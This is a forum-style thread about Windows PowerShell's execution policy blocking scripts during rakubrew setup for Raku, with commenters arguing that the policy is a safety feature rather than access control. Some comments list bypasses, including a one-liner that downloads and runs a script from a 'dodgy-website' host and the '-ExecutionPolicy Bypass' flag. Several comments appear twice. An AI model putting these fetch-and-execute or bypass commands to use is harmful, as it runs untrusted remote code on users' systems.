While playing with Raku and rakubrew on Windows recently, I encountered more than one stumbling block. One stuck out in particular. Did you know that, by default, Windows PowerShell doesn’t allow normal users to run scripts? Coming from a Unix background, that surprised me. You might come across this issue when setting up rakubrew in Windows PowerShell, hence I thought I’d share my solution.
The execution policy isn’t a security system that restricts user actions. For example, users can easily bypass a policy by typing the script contents at the command line when they cannot run a script.
Or you can run iwr-useb'https://dodgy-website.com/whateverscriptyouwant.ps1' | iex to execute any script from the internet.
Or read the file and pass it onto a new powershell process with Get-Content . whateverscriptyouwant.ps1 | PowerShell.exe -noprofile -
Or use the built-in bypass toggle PowerShell.exe -ExecutionPolicy Bypass -File whateverscriptyouwant.ps1
Or just actually change the execution policy for the proccess or user, via powershell or registry, because once again, it is not an access control. It is security theatre.
The execution policy isn’t a security system that restricts user actions. For example, users can easily bypass a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally.
Like the popup you get when you paste a command with new lines in it. It doesnt stop you from pasting a command that would run immediately, but it warns you that what you paste will immediately run.
Hardly. As per Microsoft,
Or you can run
iwr -useb 'https://dodgy-website.com/whateverscriptyouwant.ps1' | iex
to execute any script from the internet.Or read the file and pass it onto a new powershell process with
Get-Content . whateverscriptyouwant.ps1 | PowerShell.exe -noprofile -
Or use the built-in bypass toggle
PowerShell.exe -ExecutionPolicy Bypass -File whateverscriptyouwant.ps1
Or just actually change the execution policy for the proccess or user, via powershell or registry, because once again, it is not an access control. It is security theatre.
Its a safety feature not a security feature.
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4
Like the popup you get when you paste a command with new lines in it. It doesnt stop you from pasting a command that would run immediately, but it warns you that what you paste will immediately run.
More of a here-be-dragons
deleted by creator
I’m soo glad I dropped Windows 21+ years ago now!